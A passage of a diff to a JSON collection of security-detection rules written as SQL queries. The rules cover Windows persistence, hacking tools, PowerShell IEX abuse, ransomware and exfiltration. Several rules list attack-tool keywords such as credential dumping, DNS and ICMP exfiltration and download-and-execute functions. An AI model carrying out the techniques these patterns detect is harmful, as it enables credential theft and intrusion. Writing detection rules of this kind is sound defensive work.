'%.cab%' ESCAPE '\\' AND (CommandLine LIKE '%/C%' ESCAPE '\\' OR CommandLine LIKE '%/Y%' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "posh_ps_x509enrollment.yml" + "filename": "proc_creation_win_lolbin_extrac32.yml" }, { - "title": "Powershell LocalAccount Manipulation", - "id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "title": "Direct Autorun Keys Modification", + "id": 
"24357373-078f-44ed-9ac4-6d334a668a11", "status": "test", - "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", - "author": "frack113", + "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.persistence", - "attack.t1098" + "attack.t1547.001" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Disable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-LocalUser%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Windows%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' OR CommandLine LIKE '%\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\'))" ], - "filename": "posh_ps_localuser.yml" + "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml" }, { - "title": "PowerShell WMI Win32_Product Install MSI", - "id": "91109523-17f0-4248-a800-f81d9e7c081d", + "title": "Remote Access Tool - RURAT Execution From Unusual Location", + "id": "e01fa958-6893-41d4-ae03-182477c5e77d", "status": "experimental", - "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", - "author": "frack113", + "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-CimMethod %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName %' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Product %' ESCAPE '\\' AND ScriptBlockText LIKE '%-MethodName %' ESCAPE '\\' AND ScriptBlockText LIKE '%.msi%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR Image LIKE '%\\\\rfusclient.exe' ESCAPE '\\') OR Product = 'Remote Utilities') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Remote Utilities%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Remote Utilities%' ESCAPE '\\')))" ], - "filename": "posh_ps_win32_product_install_msi.yml" + "filename": 
"proc_creation_win_remote_access_tools_rurat_non_default_location.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", - "id": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", - "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "title": "Regedit as Trusted Installer", + "id": "883835a7-df45-43e4-bf1d-4268768afda4", + "status": "test", + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (ScriptBlockText LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ScriptBlockText LIKE '%system.io.streamreader%' ESCAPE '\\') AND ScriptBlockText LIKE '%readtoend' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_compress.yml" + "filename": "proc_creation_win_regedit_trustedinstaller.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", - "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "title": "HackTool - PCHunter Execution", + "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - 
"author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN 
('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" ], - "filename": "posh_ps_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_hktl_pchunter.yml" }, { - "title": "Suspicious Eventlog Clear", - "id": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "title": "HackTool - LocalPotato Execution", + "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "status": "experimental", - "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", + "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070.001" + "attack.privilege_escalation", + "cve.2023.21746" ], "falsepositives": [ - "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Clear-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Limit-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Clear-WinEvent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" ], - "filename": "posh_ps_susp_clear_eventlog.yml" + "filename": 
"proc_creation_win_hktl_localpotato.yml" }, { - "title": "PowerShell ICMP Exfiltration", - "id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", - "status": "test", - "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "title": "Lolbin Runexehelper Use As Proxy", + "id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", + "status": "experimental", + "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of System.Net.NetworkInformation.Ping class" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.NetworkInformation.Ping%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Send(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\runexehelper.exe' ESCAPE '\\')" ], - "filename": "posh_ps_icmp_exfiltration.yml" + "filename": "proc_creation_win_lolbin_runexehelper.yml" }, { - "title": "Testing Usage of Uncommonly Used Port", - "id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", - "status": "test", - "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", - "author": "frack113", + "title": "Suspicious Call by Ordinal", + "id": 
"e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "status": "stable", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1571" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate administrative script" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Test-NetConnection%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\' AND ScriptBlockText LIKE '%-port %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '% 443 %' ESCAPE '\\' OR ScriptBlockText LIKE '% 80 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" ], - "filename": "posh_ps_test_netconnection.yml" + "filename": "proc_creation_win_rundll32_by_ordinal.yml" 
}, { - "title": "Suspicious PowerShell Keywords", - "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "status": "test", - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], + "title": "Suspicious PowerShell IEX Execution Patterns", + "id": "09576804-7a05-458e-a817-eb718ca91f54", + "status": "experimental", + "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate scripts that use IEX" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR 
CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_keywords.yml" + "filename": "proc_creation_win_powershell_iex_patterns.yml" }, { - "title": "Powershell Create Scheduled Task", - "id": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", - "status": "test", - "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", - "author": "frack113", + "title": "Potential Snatch Ransomware Activity", + "id": "5325945e-f1f0-406e-97b8-65104d393fff", + "status": "stable", + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.execution", + "attack.t1204" ], "falsepositives": [ - "Unknown" + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-ScheduledTaskAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskTrigger%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskPrincipal%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskSettingsSet%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-ScheduledTask%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Invoke-CimMethod%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PS\\_ScheduledTask%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSpace%' ESCAPE '\\' AND ScriptBlockText LIKE 
'%Root\\\\Microsoft\\\\Windows\\\\TaskScheduler%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" ], - "filename": "posh_ps_cmdlet_scheduled_task.yml" + "filename": "proc_creation_win_malware_snatch_ransomware.yml" }, { - "title": "Root Certificate Installed - PowerShell", - "id": "42821614-9264-4761-acfc-5772c3286f76", - "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "Rar Usage with Password and Compression Level", + "id": "faa48cae-6b25-4f00-a094-08947fef582f", + "status": "test", + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", + "author": "@ROxPinTeddy", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Move-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Import-Certificate%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" ], - "filename": "posh_ps_root_certificate_installed.yml" + "filename": "proc_creation_win_rar_compression_with_password.yml" }, { - "title": "Data Compressed - PowerShell", - "id": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", + "title": "Changing Existing Service ImagePath Value Via Reg.EXE", + "id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", "status": "test", - "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "author": "Timur Zinniatullin, oscd.community", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1560" + "attack.persistence", + "attack.t1574.011" ], 
"falsepositives": [ - "Highly likely if archive operations are done via PowerShell." + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%-Recurse%' ESCAPE '\\' AND ScriptBlockText LIKE '%|%' ESCAPE '\\' AND ScriptBlockText LIKE '%Compress-Archive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '% ImagePath %' ESCAPE '\\' AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\'))" ], - "filename": "posh_ps_data_compressed.yml" + "filename": "proc_creation_win_reg_service_imagepath_change.yml" }, { - "title": "PowerShell PSAttack", - "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "title": "Discovery of a System Time", + "id": "b243b280-65fe-48df-ba07-6ddea7646427", "status": "test", - "description": "Detects the use of PSAttack PowerShell hack tool", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use of the system utilities to discover system time for legitimate reason" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '%time%' ESCAPE '\\') OR (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' AND CommandLine LIKE '%tz%' ESCAPE '\\')))" ], - "filename": "posh_ps_psattack.yml" + "filename": "proc_creation_win_remote_time_discovery.yml" }, { - "title": "Clear PowerShell History - PowerShell", - "id": "26b692dc-1722-49b2-b496-a8258aa6371d", - "status": "experimental", - "description": "Detects keywords that could indicate clearing PowerShell history", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", + "status": "test", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070.003" + "attack.t1574.002" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((ScriptBlockText LIKE 
'%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%del%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" ], - "filename": "posh_ps_clear_powershell_history.yml" + "filename": "proc_creation_win_gup_suspicious_execution.yml" }, { - "title": "Malicious Nishang PowerShell Commandlets", - "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "title": "Whoami.EXE Execution Anomaly", + "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", "status": "experimental", - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "author": "Alec Costello", + "description": "Detects the execution of whoami.exe with suspicious parent processes.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' 